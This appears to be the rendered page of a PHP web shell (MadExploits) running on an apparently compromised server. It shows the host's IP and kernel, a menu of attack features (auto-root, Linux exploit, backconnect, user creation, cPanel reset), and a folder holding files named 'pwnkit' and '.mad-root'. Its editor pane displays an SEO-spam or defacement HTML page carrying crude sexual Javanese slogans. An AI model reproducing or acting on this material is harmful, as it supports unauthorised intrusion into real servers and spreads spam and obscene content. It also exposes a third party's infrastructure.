Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.149.254.25
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
kamalpur /
images /
result /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
cunyuk.php
1.62
KB
-rw-r--r--
index.php
101.46
KB
-rw-r--r--
list.txt
175.88
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
sitemap.xml
279.17
KB
-rw-r--r--
tampilan.php
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tampilan.php
<!DOCTYPE html> <html> <head> <title>SEO WONG JOWO</title> <style> html, body { height: 100%; width: 100%; margin: 0; } body { background-color: #2c5a57; background-image: linear-gradient(#101922, #275451); background-size: 100%; text-align: center; line-height: 1.45; } p { text-transform: uppercase; font-family: 'Montserrat', sans-serif; font-weight: 600; font-size: 26px; letter-spacing: 4px; color: white; margin: 3em 0 1em; opacity: 0; animation: fadedown .5s ease-in-out; animation-delay: 1s; animation-fill-mode: forwards; } h1 { color: #ecdb35; font-family: 'squada one'; text-transform: uppercase; font-size: 72px; text-shadow: 0 3px red; margin: 0; transform: scale(0); animation: zoomin 1s ease-in-out; animation-delay: 2s; animation-fill-mode: forwards; } h1 span { display: inline-block; } h1 + p { font-size: 20px; letter-spacing: 2px; max-width: 50%; margin-left: auto; margin-right: auto; animation-delay: 3.5s; } @keyframes zoomin { 0% { transform: scale(0); } 90% { transform: scale(1.1); } 95% { transform: scale(1.07); } 100% { transform: scale(1); } } @keyframes fadedown { 0% { opacity: 0; transform: translate3d(0,-10px,0); } 90% { transform: translate3d(0,1px,0); } 100% { opacity: 1; transform: translate3d(0,0,0); } } </style> </head> <body> <script> function norm(value, min, max) { return (value - min) / (max - min); } function lerp(norm, min, max) { return (max - min) * norm + min; } function map(value, sourceMin, sourceMax, destMin, destMax) { return lerp(norm(value, sourceMin, sourceMax), destMin, destMax); } function map2(value, sourceMin, sourceMax, destMin, destMax, percent) { return percent <= 0.5 ? map(value, sourceMin, sourceMax, destMin, destMax) : map(value, sourceMin, sourceMax, destMax, destMin); } function fisheye(el) { let text = el.innerText.trim(), numberOfChars = text.length; el.innerHTML = "<span>" + text .split("") .map(c => { return c === " " ? " " : c; }) .join("</span><span>") + "</span>"; el.querySelectorAll("span").forEach((c, i) => { const skew = map(i, 0, numberOfChars - 1, -15, 15), scale = map2(i, 0, numberOfChars - 1, 1, 3, i / numberOfChars), letterSpace = map2(i, 0, numberOfChars - 1, 5, 20, i / numberOfChars); c.style.transform = "skew(" + skew + "deg) scale(1, " + scale + ")"; c.style.letterSpacing = letterSpace + "px"; }); } fisheye(document.querySelector("h1")); </script> <p>MONGGO PINARAK MAS KAMAR E KOSONG</p> <h1>KAPAL KERUK TALINE KENCENG</h1> <p>NDELOK TURUK KOK KONTOLE NGACENG</p> <p>SEO WONG JOWO</p> </body> </html>
Close